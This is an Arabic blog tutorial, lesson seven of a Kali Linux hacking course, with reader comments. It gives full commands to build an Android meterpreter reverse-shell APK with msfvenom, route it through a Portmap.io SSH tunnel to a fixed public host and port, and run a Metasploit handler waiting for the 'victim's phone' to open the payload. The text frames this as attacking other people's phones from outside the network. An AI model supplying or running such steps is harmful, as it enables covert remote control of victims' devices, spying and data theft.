السلام عليكم ورحمة الله وبركاته..
متابعي مدونة Droid 1x المتخصصة في مجال التقنية والتكنولوجيا والنهاردة انشاء الله انشرح الدرس السابع من كورس اختبار الاختراق
اختبار الاختراق كالي لينكس
Metasploit V6
اهلا وسهلا بكل متابعيني احنا في الدروس الي فاتت شرحنا مع بعض ازاي بنعمل بايلود وازاي بنقدر نتحكم في هاتف الضحية وازاي بنثبت جلسة الاختراق عشان نرجعلها في اي وقت وكمان قدرنا اننا نفتح بورت خارجي عشان نخترق اختراق خارج الشبكه بأداة الNgrok ولاكن وجهتنا مشكله بسيطة وهي ان البورت الي بيطلعلنا في الاداة بيتغير كل ما نقفلها ونفتحها عشان نحل المشكله دي لازم نحمل اداة Ngrok النسخه المدفوعه ولاكن في درس النهارده انشتغل بأداة تانيه خالص وكمان مجانية بس محتاج منكم شويه تركيز وطبعا بنصحكم تشوفو الشرح فيديو عشان تقدرو تفهمو اكتر وزي ما معودكم الشرح فيديو اتلاقو اخر الموضوع مش اطول عليكم احنا اول حاجه بنعملها بنروح نفتح موقع portmap
اول ما الموقع يفتح معاك ايطلب منك ايميل بتعمل ايميل عادي جداً وممكن تستخدم موقع tempmail عشان تعمل ايميل مؤقت عادي مفيش مشكله بعد ما تعمل الايميل ويفتح معاك الموقع بتدوس علي CONFIGURATIONS بعدين بتدوس علي CREATE NEW CONFIGURATION في الName اكتب اي اسم وفي الtype اختار ssh وبعدين بتدوس على Generate اتلاقي ظهرلك ملف نصي وتحتيه كلمه Download دوس عليها عشان الملف يتحمل عندك ويستحسن اختار مكان التحميل في الDesktop تمام بعد ما تحمل الملف بتروح علي الموقع وبتدوس على كلمه MAPPING RULES بعدين بدوس علي CREATE NEW RULE اول اختيار طبعا مكتوب فيه ssh وتاني اختيار بنختار tcp تالت اختيار سيبو زي ما هو رابع اختيار بتكتب البورت الي عايز تشتغل بيه ولو يكن 4444 مثلا بعدين بدوس على Generate دلوقتي بتروح تفتح ترمنال وتكتب
cd Desktop
ls
اتلاقي ظهرلك كل الملفات الي في التيسكتوب ومن ضمنهم ملف الاداة الي حملنه بنكتب
chmod 600 (file name)
دلوقتي بتدخل علي موقع portmap وبتختار MAPPING RULES اتلاقي في الخانه الي اسمها Rule امر بالون الاحمر زي دة
ssh -i ~/.ssh/mohamed38458568.mmst.pem mohamed38458568.mmst@mohamed38458568-59091.portmap.host -N -R 51491:localhost:51491
ولاكن في تغير بسيط انعمله في الامر دة اول حاجه انشيل ~/.ssh/ ونكتب
/root/Desktop/
تمام وبعد كلمه ssh علطول بتكتب
-o identitiesOnly=yes
وفي اخر الامر بتكتب
-v
تعالو نشوف الامر بقي عامل ازاي
ssh -o identitiesOnly=yes -i /root/Desktop/mohamed38458568.mmst.pem mohamed38458568.mmst@mohamed38458568-59091.portmap.host -N -R 51491:localhost:51491 -v
بتاخد الامر دة وتحطه في الترمنال وتدوس انتر
ايظهرلك الهوست تقريباً في السطر الرابع وغالبا بيكون بالشكل دة 193.161.193.99
وفي اخر سطر اتلاقي كلمه listen وجمبيها البورت الداخلي الي بندمجه جوه البايلود وبعدين بنلاقي كلمه localhost وجمبيها البورت الي احنا ضفناه في الموقع تمام الي هو 4444 دلوقتي انروح نعمل بايلود عادي ونسيب الاداة دي شغاله بنفتح ترمنال جديد ونكتب امر انشاء البايلود
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=هنا الاي بي LPORT=هنا البورت -o /root/Desktop/droid1x.apk
مكان كلمه (هنا الاي بي) بنكتب الهوست الي في الاداة الي هو دة 193.161.193.99
ومكان كلمه (هنا البورت) بنكتب البورت الداخلي الي هو جمب كلمه listen ولو يكن مثلا 54685 علي حسب ما يظهرلك تمام كده الامر بقي بالشكل دة
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=193.161.193.99 LPORT=54685 -o /root/Desktop/droid1x.apk
بعد ما تدوس انتر البايلود بيتكريت عادي جداً وبيكون مكانه في التيسكتوب دلوقتي بنكتب امر تشغيل البايلود الي هو دة
msfconsole -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST هنا الاي بي; set LPORT هنا البورت; run
مكان كلمه (هنا الاي بي) بنكتب 0.0.0.0
ومكان كلمه (هنا البورت) بنكتب البورت بتاعنا الاساسي الي هو 4444
وطبعا بندوس انتر ونستني وصول التبليغ عند فتح البايلود في تلفون الضحيه
في معلومه مهمه بقي انت دلوقتي مهما تقفل الاداة وترجع تشغلها اتلاقي الهوست زي ما هو واتلاقي البورت زي ما هو الداخلي و الخارجي مفيش اي حاجه بتتغير ودي احلا ميزة في الاداة دي ودة كان شرحنا النهارده بتمني يكون عجبكم واستفدو منه والشرح الجاي انشاء الله ايكون عن فتح بورت خارجي من خلال الراوتر او الاكسس بيوند
يمكنك مشاهدة الشرح فيديو عملي من هنا
الاداة ذي تشتغل ع التلفون وبتيرمكس او لٱ
ردحذفمنصحكش تشغلها علي تيرمكس بس ممكن تثبت NetHuntr وبعدين تثيتها عليها
حذفحضرتك لما بحط الامر في اللينكس بيقلي دخل باسوورد؟؟ ممكن حل
ردحذفباسوورد الكالي
حذف